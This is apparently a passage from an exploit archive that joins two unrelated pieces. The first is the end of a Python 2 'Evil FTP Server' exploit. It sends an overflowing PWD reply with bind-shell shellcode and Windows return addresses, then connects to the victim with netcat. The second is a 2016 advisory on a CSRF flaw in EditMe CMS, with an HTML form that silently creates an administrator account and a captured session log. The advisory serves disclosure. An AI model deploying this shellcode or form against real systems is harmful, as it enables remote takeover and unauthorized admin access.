    print "[*] CT-Zer0 Evil FTP Server Listening port 21\n"

    # \x00\x0a\x0d\x22\xff
    # msfvenom -p windows/shell_bind_tcp LPORT=5656 -f c -b '\x00\x0a\x0d\x22\xff'
    shellcode = ("\xbb\x61\xad\x84\xdf\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
                 "\x53\x31\x5a\x12\x83\xc2\x04\x03\x3b\xa3\x66\x2a\x47\x53\xe4"
                 "\xd5\xb7\xa4\x89\x5c\x52\x95\x89\x3b\x17\x86\x39\x4f\x75\x2b"
                 "\xb1\x1d\x6d\xb8\xb7\x89\x82\x09\x7d\xec\xad\x8a\x2e\xcc\xac"
                 "\x08\x2d\x01\x0e\x30\xfe\x54\x4f\x75\xe3\x95\x1d\x2e\x6f\x0b"
                 "\xb1\x5b\x25\x90\x3a\x17\xab\x90\xdf\xe0\xca\xb1\x4e\x7a\x95"
                 "\x11\x71\xaf\xad\x1b\x69\xac\x88\xd2\x02\x06\x66\xe5\xc2\x56"
                 "\x87\x4a\x2b\x57\x7a\x92\x6c\x50\x65\xe1\x84\xa2\x18\xf2\x53"
                 "\xd8\xc6\x77\x47\x7a\x8c\x20\xa3\x7a\x41\xb6\x20\x70\x2e\xbc"
                 "\x6e\x95\xb1\x11\x05\xa1\x3a\x94\xc9\x23\x78\xb3\xcd\x68\xda"
                 "\xda\x54\xd5\x8d\xe3\x86\xb6\x72\x46\xcd\x5b\x66\xfb\x8c\x33"
                 "\x4b\x36\x2e\xc4\xc3\x41\x5d\xf6\x4c\xfa\xc9\xba\x05\x24\x0e"
                 "\xbc\x3f\x90\x80\x43\xc0\xe1\x89\x87\x94\xb1\xa1\x2e\x95\x59"
                 "\x31\xce\x40\xf7\x39\x69\x3b\xea\xc4\xc9\xeb\xaa\x66\xa2\xe1"
                 "\x24\x59\xd2\x09\xef\xf2\x7b\xf4\x10\xea\x63\x71\xf6\x78\x84"
                 "\xd7\xa0\x14\x66\x0c\x79\x83\x99\x66\xd1\x23\xd1\x60\xe6\x4c"
                 "\xe2\xa6\x40\xda\x69\xa5\x54\xfb\x6d\xe0\xfc\x6c\xf9\x7e\x6d"
                 "\xdf\x9b\x7f\xa4\xb7\x38\xed\x23\x47\x36\x0e\xfc\x10\x1f\xe0"
                 "\xf5\xf4\x8d\x5b\xac\xea\x4f\x3d\x97\xae\x8b\xfe\x16\x2f\x59"
                 "\xba\x3c\x3f\xa7\x43\x79\x6b\x77\x12\xd7\xc5\x31\xcc\x99\xbf"
                 "\xeb\xa3\x73\x57\x6d\x88\x43\x21\x72\xc5\x35\xcd\xc3\xb0\x03"
                 "\xf2\xec\x54\x84\x8b\x10\xc5\x6b\x46\x91\xf5\x21\xca\xb0\x9d"
                 "\xef\x9f\x80\xc3\x0f\x4a\xc6\xfd\x93\x7e\xb7\xf9\x8c\x0b\xb2"
                 "\x46\x0b\xe0\xce\xd7\xfe\x06\x7c\xd7\x2a")

    buffer = "A" * 400 + target_eip + "\x90" * 40 + shellcode

    while True:
        victim, addr = s0ck3t.accept()
        victim.send("220 CT-Zer0 Evil FTP Service\r\n")
        print "[*] Connection accepted from %s\n" % addr[0]
        while True:
            data = victim.recv(1024)
            if "USER" in data:
                victim.send("331 User name okay, need password\r\n\r\n")
                print "\t[+] 331 USER = %s" % data.split(" ")[1],
            elif "PASS" in data:
                victim.send("230 Password accepted.\r\n230 User logged in.\r\n")
                print "\t[+] 230 PASS = %s" % data.split(" ")[1],
            elif "PWD" in data:
                victim.send('257 "' + buffer + '" is current directory\r\n')
                print "\t[+] 257 PWD"
                print "\n[*] Exploit Sent Successfully\n"
                time.sleep(2)
                print '[+] You got bind shell on port 5656\n'
                os.system('nc ' + str(addr[0]) + ' 5656')


if len(sys.argv) != 2:
    usage()
else:
    banner()
    try:
        if sys.argv[1] == "winxp":
            # 7C80C75B  JMP EBP kernel32.dll
            target_eip = "\x5B\xC7\x80\x7C"
        elif sys.argv[1] == "win7_32":
            # 76ad0299 jmp ebp  [kernel32.dll]
            target_eip = "\x99\x02\xAD\x76"
        elif sys.argv[1] == "win7_64":
            # 7619dfce jmp ebp  [kernel32.dll]
            target_eip = "\xCE\xDF\x19\x76"
        else:
            usage()
        exploit(target_eip)
    except:
        print "\n[O_o]  KTHXBYE!  [O_o]"
            
Document Title:
===============
EditMe CMS - CSRF Privilege Escalate Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1996


Release Date:
=============
2016-11-14


Vulnerability Laboratory ID (VL-ID):
====================================
1996


Common Vulnerability Scoring System:
====================================
2.8


Product & Service Introduction:
===============================
EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping, and Web CMS.
CMS in which any page can be a server side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs required. EditMe's API uses server-side JavaScript and our templates use XML, so there are no new languages to learn.

(Copy of the Vendor Homepage: http://www.editme.com/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a CSRF privilege escalation web vulnerability in the official EditMe content management system.


Vulnerability Disclosure Timeline:
==================================
2016-11-14:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the official EditMe content management system.
The vulnerability allows an attacker to issue malicious client-side web-application requests that execute non-protected functions 
in the victim's own web context.

In the absence of a security token, an attacker could execute arbitrary code in the administrator's browser to gain 
unauthorized access to the administrator access privileges.


Proof of Concept (PoC):
=======================
The cross site request forgery web vulnerability can be exploited by a malicious web application without a privileged user account and without user interaction.
To demonstrate or reproduce the CSRF web vulnerability, follow the information and steps provided below.


--- PoC: CSRF Exploitation ---
<html>
<h2>Privilege Escalate CSRF Vulnerability</h2>
<form action="http://localhost/_Register" method="post"> 
<input name="mode" value="AdminAdd" type="hidden"> 
<input name="redirect" value="" type="hidden"> 
<td><select name="user-groupname">  
<option value="A"selected="">Administrator</option></select></td> 
<input name="user-username" value="VulnerabilityLab" type="hidden">
<input name="user-password" value="1234" type="hidden">
<input name="user-password2" value="1234" type="hidden">
<input name="user-email" value="tested@live.fr"type="hidden">
<input class="button" style="font-size:110%" name="regSubmit" value="Save" type="submit"> 
</form>
</html>


--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: pentest.editme.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; __utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; __utma=1.330307796.1478254213.1478254213.1478329355.2; __utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=164978144.3.10.1478328738; __utmc=164978144; JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; __utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; editme-key="ECiu7PBk57GYeaLPUxHeDw=="
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
-
POST Method: mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr&regSubmit=Save



Security Risk:
==============
The security risk of the client-side cross site request forgery web vulnerability in the application is estimated as medium. (CVSS 2.8)


Credits & Authors:
==================
ZwX (http://zwx.fr/) [http://www.vulnerability-lab.com/show.php?user=ZwX]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com